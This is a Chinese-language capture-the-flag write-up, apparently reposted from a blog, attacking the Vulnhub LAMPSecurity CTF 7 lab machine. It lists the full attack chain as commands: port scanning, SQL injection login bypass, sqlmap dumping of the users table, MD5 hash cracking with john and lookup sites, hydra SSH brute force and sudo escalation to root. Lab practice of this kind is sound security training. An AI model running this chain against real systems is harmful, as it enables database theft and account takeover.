【Vulnhub-LAMPSecurity】CTF 7
作者:互联网
0x00环境
攻击机IP:192.168.1.28
目标机IP:192.168.1.136
0x01实战
端口扫描
nmap -sV-A -p- 192.168.1.136
可以看到开放了很多端口,其中80、8080、901、10000是http服务,那么我们就先去尝试访问这几个端口
http://192.168.1.136/
就是正常的Web页面
http://192.168.1.136:8080/login.php
是一个登录的页面
http://192.168.1.136:901/
也是需要登录才能查看
http://192.168.1.136:10000/
也是一个登录页面,尝试了万能密码无法绕过。
漏洞发现
经过长时间的查找发现在http://192.168.1.136:8080/login.php
处存在SQL注入可以使用万能密码绕过
成功登录
漏洞利用
使用sqlmap跑一下,使用burp抓包,将数据包保存并命名为sql.txt
暴库
sqlmap -r sql.txt --dbs
爆表
sqlmap -r sql.txt -D website --tables
暴字段
sqlmap -r sql.txt -D website -T users --columns
拖库
sqlmap -r sql.txt -D website -T users -C username,password --dump
将用户名和密码拖下来分别保存为username.txt和password.txt,使用john破解密码
john --format=Raw-MD5 password.txt
太慢了还是使用网站
- https://www.cmd5.com/
- https://www.somd5.com/
最终结果
将得到的明文密码保存为password2.txt,使用hydra进行爆破
hydra -L username.txt -P password2.txt -t 4 192.168.1.136 ssh
在前面的端口扫描中我们看到开放了22-SSH端口,尝试登录,登录成功。
提权
查看当前用户可以使用的sudo权限
sudo -l
可以看到当前用户可以以root身份运行所有命令
尝试使用sudo su
提升权限,成功拿到root权限
sudo su
标签:sqlmap,http,LAMPSecurity,192.168,1.136,--,CTF,Vulnhub,txt 来源: https://blog.csdn.net/qq_44276741/article/details/122835156